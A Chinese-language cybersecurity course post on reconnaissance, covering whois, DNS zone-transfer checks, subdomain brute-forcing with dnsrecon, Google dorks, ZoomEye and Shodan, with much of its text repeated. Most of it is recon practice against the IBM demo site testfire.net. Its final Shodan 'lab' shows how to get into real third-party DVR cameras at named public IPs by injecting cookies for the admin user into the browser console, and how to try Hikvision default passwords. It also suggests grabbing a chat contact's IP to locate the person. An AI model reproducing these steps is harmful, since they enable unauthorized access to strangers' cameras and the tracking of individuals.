【CyberSecurityLearning 53】信息收集
目錄
信息收集
DNS 信息
whois查詢
域傳送漏洞
實驗:子域名爆破
工具:
DNS2IP
ping
nslookup
信息收集
DNS 信息
whois查詢
子域名查詢
域傳送漏洞
實驗:子域名爆破
工具:
DNS2IP
ping
nslookup
dig工具
dnsenum(推薦)
利用站長工具
CDN 加速問題
IP 查詢
IP 查詢
同IP 網站查詢(重要)
IP whois 查詢
IP2Location
查詢IP 地址經緯度
通過GPS 查詢物理位置
利用搜索引擎搜集信息
Google hacking
探索網站目錄結構
搜索容易存在sql 注入的頁面
搜索指定的文件類型
搜索phpinfo()
搜索phpstudy
搜索php 探針
鐘馗之眼
搜索iis6.0 組件
搜索開啟3389 端口的windows 主機
shodan(推薦)
網站信息收集
實驗:shodan(上面的截圖是步驟)
信息收集
為什么學習這節課程
在劃定了測試范圍之后,就需要進入信息收集階段。在這個階段,滲透人員需要使用各種公共資源盡可能地獲取測試目標的相關信息。他們從互聯網上搜集信息的渠道主要有:
| @ | 論壇 |
| @ | 公告板 |
| @ | 新聞組 |
| @ | 媒體文章 |
| @ | 博客 |
| @ | 社交網絡 |
| @ | 其他商業或非商業性網站 |
| @ | GitHub |
….
此外,他們也可以借助各種搜索引擎中獲取相關數據,如谷歌、雅虎、MSN必應、百度等。收集信息主要包括DNS 服務器、路由關系、whois 數據庫、電子郵件地址、電話號碼、個人信息以及用戶賬戶。收集信息越多,滲透測試成功的概率越高
本課程以[testfire.net]為目標,testfire.net 是IBM 公司為了演示旗下比較有名的Web 漏洞掃描器AppScan 的強大功能所搭建的模擬銀行網站,所以上面會有很多常見的Web 安全漏洞
類似的測試網站
[http://vulnweb.com/],為了演示AVWS
可以拿上面兩個網站去練手
?
DNS 信息
在收集DNS 信息的時候,主要關注域名或注冊商,管理員聯系方式,電話和郵箱,子域名等信息。
-
whois查詢
whois是一個集成在kali 虛擬機中的小工具
whois工具可以用來查詢域名注冊信息。
[whois domain]
[whois testfire.net]
也可以通過站長之家進行whois 查詢[http://whois.chinaz.com]
除了whois 查詢以外,還可以進行反查。
| @ | 郵箱反查 |
| @ | 注冊人反查 |
| @ | 電話反查 |
子域名查詢
可以查詢子域名的網站[https://searchdns.netcraft.com/],這種方法查詢大型網站比較有優勢
| @方法1 | Netcraft.com |
| @方法2 | 證書(點一下那個小鎖--更多信息) |
-
域傳送漏洞
?
DNS區域傳送指的是一臺備用服務器使用來自主服務器的數據刷新自己的域數據庫。這為運行中的DNS 服務提供了一定的冗余度,其目的是為了防止主域名服務器因為意外故障變得不可用時影響到整個域名的解析。一般來說,DNS區域傳送操作只在網絡中真的有備用域名服務器的時候才有必要用到,但是許多DNS服務器卻被錯誤的配置成只要有client 發出請求,就會像對方提供一個zone 的數據庫的詳細信息,所以說允許不受信任的英特網用戶執行DNS區域傳送操作是后果最為嚴重的錯誤配置之一。
可以使用dig 工具來檢測域傳送漏洞,命令如下
[dig axfr @dns.example.com example.com]
dig axfr? @your-ip www.vulhub.org
dig axfr @172.16.132.1 www.vulhub.org
kali中有dig工具
通過域傳送漏洞,可以得到子域名信息,和網站的子域名對應的ip地址
?
實驗:子域名爆破
- 工具:子域名挖掘機
- dnsrecon
[dnsrecon -d vulnweb.co -D /root/dic/dns.dic -t brt]
現在的子域名爆破越來越不靠譜,但是還是要了解一下
子域名挖掘機的字典是dic.txt(程序寫死了的)
準備一個字典寫上所有的域名(4個字母左右別超過10個)。字典中的每個單詞,依次去嘗試
工具不重要,重要的是字典
工具:
1、layer(子域名挖掘機)
2、dnsrecon(kali自帶)
dnsrecon -d vulnweb.com -D /root/tmp/dic/dns.dic -t brt
-d???????? 指定域名
-D??????? 指定字典 (給絕對路徑)
-t brt ?? 指定枚舉形式? 爆破(指定模式)
DNS2IP
通過DNS 解析找到IP地址
-
ping
非權威解答
ping testfire.net
65.61.137.117
ping baidu.com
39.156.69.79
ping www.baidu.com
36.152.44.95
-
nslookup
testfire.net????? 65.61.137.117
------------
> testfire.net
Server:??????????????? 192.168.1.2
Address:??????? 192.168.1.2#53
?
Non-authoritative answer:
Name:??????? testfire.net
Address: 65.61.137.117
------
------------
> baidu.com
Server:??????????????? 192.168.1.2
Address:??????? 192.168.1.2#53
?
Non-authoritative answer:
Name:??????? baidu.com
Address: 39.156.69.79
Name:??????? baidu.com
Address: 220.181.38.148
------
?
信息收集
為什么學習這節課程
在劃定了測試范圍之后,就需要進入信息收集階段。在這個階段,滲透人員需要使用各種公共資源盡可能地獲取測試目標的相關信息。他們從互聯網上搜集信息的渠道主要有:
| @ | 論壇 |
| @ | 公告板 |
| @ | 新聞組 |
| @ | 媒體文章 |
| @ | 博客 |
| @ | 社交網絡 |
| @ | 其他商業或非商業性網站 |
| @ | GitHub |
….
?
此外,他們也可以借助各種搜索引擎中獲取相關數據,如谷歌、雅虎、MSN必應、百度等。收集信息主要包括DNS 服務器、路由關系、whois 數據庫、電子郵件地址、電話號碼、個人信息以及用戶賬戶。收集信息越多,滲透測試成功的概率越高
?
本課程以[testfire.net]為目標,testfire.net 是IBM 公司為了演示旗下比較有名的Web 漏洞掃描器AppScan 的強大功能所搭建的模擬銀行網站,所以上面會有很多常見的Web 安全漏洞
類似的測試網站
[http://vulnweb.com/]
?
DNS 信息
在收集DNS 信息的時候,主要關注域名或注冊商,管理員聯系方式,電話和郵箱,子域名等信息。
?
-
whois查詢
whois是一個集成在kali 虛擬機中的小工具
whois工具可以用來查詢域名注冊信息。
?
[whois domain]
[whois testfire.net]
也可以通過站長之家進行whois 查詢[http://whois.chinaz.com]
?
除了whois 查詢以外,還可以進行反查。
?
| @ | 郵箱反查 |
| @ | 注冊人反查 |
| @ | 電話反查 |
| ? | ? |
?
-
子域名查詢
可以查詢子域名的網站[https://searchdns.netcraft.com/],這種方法查詢大型網站比較有優勢
| @ | Netcraft.com |
| @ | 證書 |
?
-
域傳送漏洞
DNS區域傳送指的是一臺備用服務器使用來自主服務器的數據刷新自己的域數據庫。這為運行中的DNS 服務提供了一定的冗余度,其目的是為了防止主域名服務器因為意外故障變得不可用時影響到整個域名的解析。一般來說,DNS區域傳送操作只在網絡中真的有備用域名服務器的時候才有必要用到,但是許多DNS服務器卻被錯誤的配置成只要有client 發出請求,就會像對方提供一個zone 的數據庫的詳細信息,所以說允許不受信任的英特網用戶執行DNS區域傳送操作是后果最為嚴重的錯誤配置之一。
可以使用dig 工具來檢測域傳送漏洞,命令如下
[dig axfr @dns.example.com example.com]
?
通過域傳送漏洞
子域名信息
子域名對應的IP地址
?
實驗:子域名爆破
- 工具:子域名挖掘機
- dnsrecon
[dnsrecon -d vulnweb.co -D /root/dic/dns.dic -t brt]
?
準備一個字典寫上所有的域名(4個字母左右別超過10個)。字典中的每個單詞,依次去嘗試
工具不重要,重要的是字典
?
工具:
1、layer(子域名挖掘機)
2、dnsrecon
dnsrecon -d vulnweb.com -D /root/tmp/dic/dns.dic -t brt
-d 指定域名 -D 指定字典 -t 指定模式
?
?
DNS2IP
通過DNS 解析找到IP地址
-
ping
非權威解答
ping testfire.net
65.61.137.117
?
ping baidu.com
39.156.69.79
?
ping www.baidu.com
39.156.66.18
?
-
nslookup
testfire.net????? 65.61.137.117
------------
> testfire.net
Server:????????????????192.168.1.2
Address:????????192.168.1.2#53
?
Non-authoritative answer:
Name:????????testfire.net
Address: 65.61.137.117
------
------------
> baidu.com
Server:????????????????192.168.1.2
Address:????????192.168.1.2#53
?
Non-authoritative answer:
Name:????????baidu.com
Address: 39.156.69.79
Name:????????baidu.com
Address: 220.181.38.148
------
------------
> www.baidu.com
Server:????????????????192.168.1.2
Address:????????192.168.1.2#53
?
Non-authoritative answer:
www.baidu.com????????canonical name = www.a.shifen.com.
Name:????????www.a.shifen.com
Address: 39.156.66.14
Name:????????www.a.shifen.com
Address: 39.156.66.18
--------
?
-
dig工具
dig testfire.net
dig @8.8.8.8 testfire.net??? 指定dns服務器
dig +trace testfire.net???? 獲取域名的詳細解析過程
?
-
dnsenum(推薦)
dnsenum testfire.net
此處推薦dnsenum,此工具在解析域名的時候,會自動檢測域傳送漏洞
-
利用站長工具
http://tool.chinaz.com/dns/
路由追蹤
-
CDN 加速問題
CDN 是內容分發網絡
本意是進行節點緩存,是網站訪問速度加快。一般情況下是沒辦法得到目標的網站的真實IP 的。關于SDN 加速可以作為一個課題。
參考資料如下:(獲取CDN)
https://www.t00ls.net/
http://www.91ri.org/6233.html
http://www.91ri.org/3563.html
IP 查詢
-
IP 查詢
http://ip.chinaz.com/65.61.137.117
-
同IP 網站查詢(重要)
同一個IP 上的網站
1.1.1.1
A?????????????? B
A和B就是旁站的關系(同一個服務器上的兩個網站)“曲線救國”
1.1.1.*??????? C 段查詢
-
IP whois 查詢
-
IP2Location
65.61.137.117
-
查詢IP 地址經緯度
https://www.maxmind.com/zh/home
得到IP地址的大致經緯度(40.9476, -73.8624)
這個ip地址對查公司來講不是特別準,查個人比較準
你聊QQ的時候把它IP地址抓到,就知道地理位置
-
通過GPS 查詢物理位置
http://www.gpsspg.com/maps.htm
利用搜索引擎搜集信息
-
Google hacking
Google 機器人,爬行全世界所有網站的內容。Google hacker 就是利用搜索引擎語法,獲取有關網站的信息。
| site | 指定網站 |
| "" | 包含關鍵字 |
| inurl | 在url 中出現的關鍵字 |
| filetype | 指定文件類型(不太好用) |
-
探索網站目錄結構
"parent directory" site:testfire.net??? #搜索testfire.net 網站的parent directory關鍵字
?
-
搜索容易存在sql 注入的頁面
site:testfire.net inurl:login
?
-
搜索指定的文件類型
filetype pdf
-
搜索phpinfo()
intext:"PHP Version" exit:php intest:"disabled" intext:"BuildDate" intext:"Syatem" intext:"allow_url_fopen"
-
搜索phpstudy
-
搜索php 探針
intitle:"php中文網 探針2014"
-
鐘馗之眼
https://www.zoomeye.org/
ZoomEye 支持公網設備指紋檢索和Web 指紋檢索。網站指紋包括應用名、版本、前端框架、后端框架、服務端語言、服務器操作系統、網站容器、內容管理系統和數據等。
-
搜索iis6.0 組件
app:"Microsoft IIS httpd" ver:"6.0"
-
搜索開啟3389 端口的windows 主機
port:3389 OS:windows
shodan(推薦)
https://www.shodan.io/
JAWS/1.1(攝像頭)
網站信息收集
收集指紋信息
Web 服務器信息
??????????? netcraft.net
裝插件
火狐插件
Netcraft Extension
Wappalyzer
?
?
?
Hikvision
?
實驗:shodan(上面的截圖是步驟)
搜索JAWS/1.1
點擊第一個
在地址欄輸入IP:87.10.224.71
發現登陸不了
F12打開控制臺,把下面代碼復制進去
document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";
執行后,你在url后加上/view2.html,發現進去了
裝一下flash
直接在本地訪問一下比較好,點擊here
有的能訪問有的不能
試一下Hikvision
78.36.3.246
admin?? 12345
?
?
?
總結
以上是生活随笔為你收集整理的【CyberSecurityLearning 53】信息收集的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 作者:张金芳(1970-),男,中国科学
- 下一篇: 2015年《大数据》高被引论文 Top1